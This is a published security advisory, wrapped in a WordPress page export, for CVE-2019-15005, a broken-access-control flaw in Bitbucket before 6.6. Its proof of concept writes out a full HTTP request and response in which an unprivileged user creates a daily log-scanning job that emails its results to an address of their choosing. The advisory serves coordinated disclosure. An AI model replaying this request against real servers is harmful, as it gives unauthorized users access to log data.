{"id":16607,"date":"2021-07-08T11:31:29","date_gmt":"2021-07-08T09:31:29","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0016\/"},"modified":"2021-07-19T14:11:12","modified_gmt":"2021-07-19T12:11:12","slug":"usd-2019-0016","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0016\/","title":{"rendered":"usd-2019-0016"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2019-0016 | Bitbucket v5.10.1 \u2013 Broken Access Control 2<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0016<\/span>
CVE Number<\/strong>: CVE-2019-15005 <\/span>
Affected Product<\/strong>: Bitbucket<\/span>
Affected Version<\/strong>: < v6.6<\/span>
Vulnerability Type<\/strong>: Broken Access Control<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/www.atlassian.com\/<\/a>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Access control, sometimes called authorization, is how a web application grants access to content and functions to some users and not others.<\/span>
These checks are performed after authentication, and govern what \u2018authorized\u2019 users are allowed to do. Access control sounds like a simple problem but is insidiously difficult to implement correctly.<\/span>
A web application\u2019s access control model is closely tied to the content and functions that the site provides. In addition, the users may fall into a number of groups or roles with different abilities or privileges.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n
\n

Inside the endpoint \u201e\/rest\/troubleshooting\/latest\/hercules\/periodicScanner\/settings\u201c an administrator can create a job for scanning logfiles periodicaly.
Unpriviliged users don\u2019t have access to the GUI which configures such jobs. But unprivileged users can successfully send a request to create a scanning job.
In particular they can state an email address, to which the results will be send.<\/p>\n

Request (send from an normal user):<\/p>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]POST \/rest\/troubleshooting\/latest\/hercules\/periodicScanner\/settings HTTP\/1.1
\nHost: hostname
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0
\nAccept: *\/*
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nContent-Type: application\/x-www-form-urlencoded
\nX-Atlassian-Token: no-check
\nX-Requested-With: XMLHttpRequest
\nContent-Length: 139
\nCookie: BITBUCKETSESSIONID=7C0B64E8BD71F211473E99B718E58CC7;
\nDNT: 1
\nConnection: close<\/p>\n

atl_token=2b8b95d4b3baba6ae79ceae9139839cbe06a9ca6&amp;enabled=on&amp;start-time-hour=2&amp;start-time-minute=4&amp;frequency=daily&amp;recipients=bla%40bla.de<\/p>\n

Response:
\nHTTP\/1.1 200
\nVary: Accept-Encoding
\nContent-Type: application\/json
\nDate: Thu, 07 Mar 2019 11:46:53 GMT
\nConnection: close
\nContent-Length: 83<\/p>\n

{\"feedback\":\"This job will be run daily starting at 3\/8\/19 2:04 AM (server time).\"}<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Protect endpoints, which provide sensitive functionalities, with proper access control.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2019-03-28 Vulnerability securely submitted to security@atlassian.com<\/li>\n
  • 2019-08-27 Atlassian releases Bitbucket 6.6.0 which addresses the vulnerability<\/li>\n
  • 2019-10-21 First Published<\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerabilities were found by Tobias Neitzel and Julian Frey of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2019-0016 | Bitbucket v5.10.1 \u2013 Broken Access Control 2 Advisory ID: usd-2019-0016CVE Number: CVE-2019-15005 Affected Product: BitbucketAffected Version: < v6.6Vulnerability Type: Broken Access ControlSecurity Risk: HighVendor URL: https:\/\/www.atlassian.com\/Vendor Status: Fixed Description Access control, sometimes called authorization, is how a web application grants access to content and functions to some users and not others.These checks are […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16607","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16607"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16607\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}